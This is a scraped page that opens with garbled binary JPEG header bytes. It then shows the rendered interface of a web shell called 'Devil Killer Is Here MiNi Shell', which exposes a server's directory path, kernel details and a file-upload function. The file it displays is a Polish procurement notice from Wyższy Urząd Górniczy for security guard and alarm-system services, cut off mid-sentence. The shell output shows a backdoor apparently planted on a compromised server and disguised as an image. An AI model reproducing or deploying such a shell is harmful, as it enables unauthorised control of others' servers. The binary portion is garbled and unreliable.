JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250124/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250124/0006119601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przedmiotem zamówienia jest kompleksowa usługa ochrony osób i mienia wraz <br/>z eksploatacją, konserwacją oraz naprawą urządzeń i systemów wskazanych przez Zamawiającego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wyższy Urząd Górniczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000332245</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Poniatowskiego 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-055</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zakupy@wug.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wug.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> nadzór górniczy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przedmiotem zamówienia jest kompleksowa usługa ochrony osób i mienia wraz <br/>z eksploatacją, konserwacją oraz naprawą urządzeń i systemów wskazanych przez Zamawiającego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b219bf4e-84bf-409c-8866-286ecd691b9a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00061196</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00060105/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Kompleksowa usługa ochrony osób i mienia w zakresie świadczenia usługi bezpośredniej ochrony fizycznej oraz usługi zabepeczenia technicznego., w podziele na części</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://wug.ezamawiajacy.pl/pn/wug/demand/192661/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym, a wykonawcami odbywa się wyłącznie przy<br/>użyciu środków komunikacji elektronicznej zgodnie z art. 61 ustawy Pzp, za pośrednictwem elektronicznej platformy zakupowej<br/>dostępnej pod adresem: https://wug.ezamawiajacy.pl, zwanej dalej „platformą”.<br/><br/>Tym samym z uwagi, iż zamawiający nie przewiduje innego sposobu komunikacji niż przy użyciu środków komunikacji<br/>elektronicznej, nie precyzuje informacji, o której mowa w art. 281 ust. 1 pkt 9 ustawy Pzp.<br/>Instrukcja dla wykonawcy w zakresie funkcji i obsługi platformy dostępna jest pod adresem:<br/>https://wug.ezamawiajacy.pl/servlet/HomeServlet?<br/>MP_module=main&amp;MP_action=publicFilesList&amp;clientName=wug&amp;USER_MENU_HOVER=publicFilesList.<br/>Natomiast w przypadku gdy powyższe hiperłącze nie będzie działać instrukcję można pobrać z platformy z zakładki „baza wiedzy”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ogólne zasady korzystania z platformy:<br/>a) zamawiający poprzez platformę zapewnia pełny, bezpośredni i nieograniczony dostęp do dokumentów postępowania,<br/>b) przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na platformie, ani logowania<br/>do platformy,<br/>c) do udziału w postępowaniu wymagane jest zalogowanie się wykonawcy do platformy, które odbywa się na subdomenie Wyższego<br/>Urzędu Górniczego; https://wug.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl.<br/>d) wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”;<br/>e) rejestracja konta następuje automatycznie poprzez:<br/>- podpisanie się pod wnioskiem podpisem elektronicznym (kwalifikowanym, osobistym lub profilem zaufanym), lub<br/>- kontakt z numerem telefonu podanym w potwierdzeniu, lub<br/>- jeżeli użytkownik nie podpisze się na wniosku ani nie skontaktuje się telefonicznie. Konto zostanie aktywowane w ciągu<br/>maksymalnie 6 godzin roboczych,<br/>f) zarejestrowanie i utrzymywanie konta na platformie oraz korzystanie z platformy jest bezpłatne,<br/>g) wykonawca w celu wyjaśnienie treści SWZ zwraca się z wnioskiem o wyjaśnienie treści SWZ do zamawiającego za pomocą<br/>platformy poprzez:<br/>• opcję „zadaj pytanie (dostęp nieograniczony), lub<br/>• przy użyciu zakładki „korespondencja” (dla użytkowników zarejestrowanych).<br/>Pytanie w opcji „zadaj pytanie” odbywa się klikając lewym przyciskiem myszy w ikonę „ZADAJ PYTANIE”. Powoduje to otwarcie<br/>okna, w którym należy uzupełnić dane wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z<br/>wymaganym kodem weryfikującym z obrazka wykonawca klika klawisz „POTWIERDŹ”, wykonawca uzyskuje potwierdzenie wysłania<br/>pytania poprzez komunikat systemowy &#34;pytanie wysłane&#34;,<br/>i) treść pytań (bez ujawniania źródła zapytania) wraz z wyjaśnieniami bądź informacje o dokonaniu modyfikacji SWZ, zamawiający<br/>udostępnia za pośrednictwem platformy,<br/>j) korespondencja oraz przekazywanie dokumentów odbywać się będzie za pośrednictwem platformy,<br/>k) niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformie tj.:<br/>- stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>- komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej<br/>przeglądarki internetowej;<br/>- zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/>- zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>l) dopuszczalne wielkości i formaty przesyłanych danych tj. plików o wielkości do 2 GB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt,<br/>docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z,<br/>html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>m) kodowanie i czas przekazania i odbioru danych:<br/>- plik załączony przez wykonawcę na platformie i zapisany, widoczny jest w systemie, jako zaszyfrowany – format kodowania UTF8.<br/>Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez zamawiającego po upływie terminu otwarcia ofert.<br/>- oznaczenie czasu odbioru danych przez platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego odpowiednim źródłem czasu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych jest Prezes Wyższego Urzędu Górniczego, 40- 055 Katowice, ul. Poniatowskiego 31.<br/><br/>W sprawach związanych z ochroną danych osobowych można kontaktować się z Inspektorem Ochrony Danych za pośrednictwem<br/>poczty e-mail: iod@wug.gov.pl, telefonicznie 32 7361857 lub pisemnie na adres siedziby administratora: Inspektor Ochrony Danych,<br/>Wyższy Urząd Górniczy, 40-055 Katowice, ul. Poniatowskiego 31,<br/><br/>Ponadto odbiorcą osobowych będzie również spółka Otwarty Rynek Elektroniczny S.A. z siedzibą w Warszawie przy ulicy<br/>Domaniewskiej 49 (00-672 Warszawa), wpisana do Krajowego Rejestru Sądowego przez Sąd Rejonowy dla m. st Warszawy, XII<br/>Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS 0000041441 NIP 5262535153 REGON 017282436, jako<br/>właściciel Systemu, za pomocą którego zamawiający prowadzi postępowania o udzielenie zamówienia publicznego.<br/><br/>Dane osobowe będą przechowywane zgodnie z obowiązującą w Wyższym Urzędzie Górniczym Instrukcją Kancelaryjną i przepisami o archiwizacji dokumentów – kategoria B przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia.<br/><br/>Jednocześnie Zamawiający, informuje iż pełna treść klauzuli informacyjnej stanowi załącznik nr 1 do Specyfikacji Warunków Zamówienia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BAG/01/2025/TP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kompleksowa usługa ochrony osób i mienia wraz z eksploatacją, konserwacją oraz naprawą urządzeń i systemów alarmowych antywłamaniowych, telewizji przemysłowej oraz przeciwpożarowych, sygnalizujących zagrożenie chronionych osób i mienia dla lokalizacji przy ul. Poniatowskiego 31, 29, 29a w Katowicach<br/><br/>Szczegółowy opis przedmiotu zamówienia dla określa załącznik nr 2 do SWZ oraz projektowane postanowienia umowy stanowiące załącznik nr 9 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79700000-1 - Usługi detektywistyczne i ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79710000-4 - Usługi ochroniarskie</p> <p class="mb-0">79715000-9 - Usługi patrolowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zakres przedmiotu zamówienia obejmuje:<br/>a)	zamówienie podstawowe (część gwarantowana), w ramach którego wykonawca będzie świadczył na rzecz zamawiającego kompleksową usługę ochrony osób i mienia wraz z eksploatacją, konserwacją oraz naprawą urządzeń i systemów wskazanych przez zamawiającego przez okres 24 miesięcy,<br/>b)	zamówienie objęte prawem opcji, w ramach którego wykonawca będzie świadczył na rzecz zamawiającego kompleksową usługę ochrony osób i mienia wraz z eksploatacją, konserwacją oraz naprawą urządzeń i systemów wskazanych przez zamawiającego przez okres kolejnych 24 miesięcy, następujących bezpośrednio po części gwarantowanej.<br/><br/>Warunkiem uruchomienia prawa opcji będzie złożenie przez zamawiającego pisemnego oświadczenia woli w przedmiocie skorzystania z prawa opcji w zakresie określonym przez zamawiającego w terminie 60 dni przed końcem aktualnego obowiązywania umowy. <br/><br/>Oświadczenie, to może być składane przez zamawiającego dwukrotnie, na okres obejmujący co najmniej 12 miesięcy, z zachowaniem końcowego terminu realizacji zamówienia.<br/><br/>Zamawiający nie ma obowiązku skorzystania z prawa opcji. W przypadku nieskorzystania przez zamawiającego z prawa opcji, wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/><br/>Zamówienie objęte prawem opcji realizowane ma być na tych samych warunkach, co zamówienie realizowane w ramach zamówienia podstawowego. Tym samym, postanowienia niniejszej dokumentacji mają zastosowanie do części gwarantowanej, jak i opcjonalnej. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">48 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Ocena ofert będzie dokonywana oddzielnie dla każdej części przedmiotu zamówienia.<br/>2.	Kryterium „cena” rozpatrywane będzie według zaoferowanej przez wykonawcę łącznej ceny brutto.<br/>Punkty dla pozostałych ofert będą liczone wg wzoru:<br/>	C= (C1/C2) x 100% x 100<br/>	gdzie:<br/>	C – ilość punktów uzyskanych przez badaną ofertę,<br/>	C1 – cena brutto oferty z najniższą ceną spośród ofert nieodrzuconych/ niepodlegających odrzuceniu,<br/>	C2 – cena brutto oferty badanej.<br/>Oferta z najniższą łączną ceną brutto uzyska 100 pkt.<br/>	Wyliczenie punktów w zakresie powyższego kryterium zostanie dokonane z dokładnością do dwóch miejsc po przecinku zgodnie z matematycznymi zasadami zaokrąglania.<br/>3. Ocenie będzie podlegać zaoferowana przez wykonawcę łączna cena brutto za realizację zamówienia w ramach zamówienia podstawowego oraz zamówienia objętego prawem opcji.<br/>4.	Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą ilość punktów w ww. kryterium.<br/>2.	W toku badania i oceny ofert zamawiający może żądać od wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kompleksowa usługa ochrony osób i mienia wraz z eksploatacją, konserwacją oraz naprawą urządzeń i systemów alarmowych antywłamaniowych, telewizji przemysłowej, sygnalizujących zagrożenie chronionych osób i mienia dla lokalizacji przy ul. Obroki 87 w Katowicach. <br/><br/>Szczegółowy opis przedmiotu zamówienia określa załącznik nr 2 do SWZ oraz projektowane postanowienia umowy stanowiące załącznik nr 9 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79700000-1 - Usługi detektywistyczne i ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79710000-4 - Usługi ochroniarskie</p> <p class="mb-0">79715000-9 - Usługi patrolowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zakres przedmiotu zamówienia obejmuje:<br/>a)	zamówienie podstawowe (część gwarantowana), w ramach którego wykonawca będzie świadczył na rzecz zamawiającego kompleksową usługę ochrony osób i mienia wraz z eksploatacją, konserwacją oraz naprawą urządzeń i systemów wskazanych przez zamawiającego przez okres 24 miesięcy,<br/>b)	zamówienie objęte prawem opcji, w ramach którego wykonawca będzie świadczył na rzecz zamawiającego kompleksową usługę ochrony osób i mienia wraz z eksploatacją, konserwacją oraz naprawą urządzeń i systemów wskazanych przez zamawiającego przez okres kolejnych 24 miesięcy, następujących bezpośrednio po części gwarantowanej.<br/><br/>Warunkiem uruchomienia prawa opcji będzie złożenie przez zamawiającego pisemnego oświadczenia woli w przedmiocie skorzystania z prawa opcji w zakresie określonym przez zamawiającego w terminie 60 dni przed końcem aktualnego obowiązywania umowy. <br/><br/>Oświadczenie, to może być składane przez zamawiającego dwukrotnie, na okres obejmujący co najmniej 12 miesięcy, z zachowaniem końcowego terminu realizacji zamówienia.<br/><br/>Zamawiający nie ma obowiązku skorzystania z prawa opcji. W przypadku nieskorzystania przez zamawiającego z prawa opcji, wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/><br/>Zamówienie objęte prawem opcji realizowane ma być na tych samych warunkach, co zamówienie realizowane w ramach zamówienia podstawowego. Tym samym, postanowienia niniejszej dokumentacji mają zastosowanie do części gwarantowanej, jak i opcjonalnej. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">48 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Ocena ofert będzie dokonywana oddzielnie dla każdej części przedmiotu zamówienia.<br/>2.	Kryterium „cena” rozpatrywane będzie według zaoferowanej przez wykonawcę łącznej ceny brutto.<br/>Punkty dla pozostałych ofert będą liczone wg wzoru:<br/>	C= (C1/C2) x 100% x 100<br/>	gdzie:<br/>	C – ilość punktów uzyskanych przez badaną ofertę,<br/>	C1 – cena brutto oferty z najniższą ceną spośród ofert nieodrzuconych/ niepodlegających odrzuceniu,<br/>	C2 – cena brutto oferty badanej.<br/>Oferta z najniższą łączną ceną brutto uzyska 100 pkt.<br/>	Wyliczenie punktów w zakresie powyższego kryterium zostanie dokonane z dokładnością do dwóch miejsc po przecinku zgodnie z matematycznymi zasadami zaokrąglania.<br/>3. Ocenie będzie podlegać zaoferowana przez wykonawcę łączna cena brutto za realizację zamówienia w ramach zamówienia podstawowego oraz zamówienia objętego prawem opcji.<br/>4.	Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą ilość punktów w ww. kryterium.<br/>2.	W toku badania i oceny ofert zamawiający może żądać od wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: <br/>a)	zdolności do występowania w obrocie gospodarczym: zamawiający nie stawia warunku w powyższym zakresie; <br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający uzna ww. warunek za 